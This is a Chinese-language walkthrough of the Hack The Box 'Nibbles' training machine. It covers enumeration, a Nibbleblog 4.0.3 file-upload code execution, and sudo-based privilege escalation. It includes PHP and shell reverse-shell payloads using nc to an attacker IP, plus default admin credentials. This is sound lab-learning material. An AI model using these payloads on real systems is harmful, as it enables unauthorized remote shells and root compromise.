Nibbles - HackMD

# Nibbles ###### tags: `HTB ACADEMY GETTING STARTED`! ## step1. Information Enumeration ``` nmap -sC -sV 10.129.66.130 ``` ![](https://i.imgur.com/ku1FcWF.png) 只有發現80和22端口 ## step2. Exploit 首頁打開只有行文字，查看註解之後發現有個資料夾可以看看 ![](https://i.imgur.com/8HNDmRI.png) ``` https://10.129.66.130/nibbleblog ``` ![](https://i.imgur.com/AAk8u9A.png) ### 目錄爆破 ``` gobuster dir -u http://10.129.66.130/nibbleblog/ -w /usr/share/wordlists/dirb/common.txt ``` ![](https://i.imgur.com/gU7EELM.png) ``` http://10.129.66.130/nibbleblog/README ``` ![](https://i.imgur.com/kzrHkaO.png) #### Nibbleblog v4.0.3 [NibbleBlog 4.0.3: Code Execution](https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html) 漏洞概述： Nibbleblog v4.0.3 預設安裝 "My image"外掛，它不會檢查副檔名，因此可以執行PHP[(RCE漏洞)](https://cloud.tencent.com/developer/article/1668900)，進而達成CSRF攻擊。前提是需要先登入後台取得管理員權限。 ### 網站後台 ``` admin/nibbles ``` ![](https://i.imgur.com/kR2gZJS.png) 找到"My image"外掛，上傳poc然後點擊 image.php 執行它 ``` poc:<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack ip> <attack port> >/tmp/f"); ?> ``` ![](https://i.imgur.com/9P3IjYq.png) ![](https://i.imgur.com/afloXYQ.png) ``` 監聽： nc -nvlp <attack port> ``` ![](https://i.imgur.com/RRJOE4V.png) ### 成功拿下user權限 ## step3. Privilege escalation sudo -l :找到一個moniror.sh 擁有root權限這邊看起來是一個bash腳本，可以使用echo寫入攻擊代碼 ![](https://i.imgur.com/YQXb6BW.png) ``` poc:echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack ip> <attack port> >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh ``` ![](https://i.imgur.com/SVSxcUu.png) 如果不確定有沒有寫入成功可以使用cat檢查看看如果是成功寫入的文件末端是長這樣 ![](https://i.imgur.com/Wogc4b4.png) 會多出這一樣 ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.152 9443 >/tmp/f ``` ``` sudo personal/stuff/monitor.sh ``` ![](https://i.imgur.com/6ZAYaZt.png) ``` nc -nvlp 9443 ``` ![](https://i.imgur.com/LvXWIf8.png) ### 成功取得root權限 --- ``` 可以知道 '使用者'@'機器':'路徑' 的指令 python3 -c 'import pty; pty.spawn("/bin/bash")' ``` ![](https://i.imgur.com/VSiz4ID.png)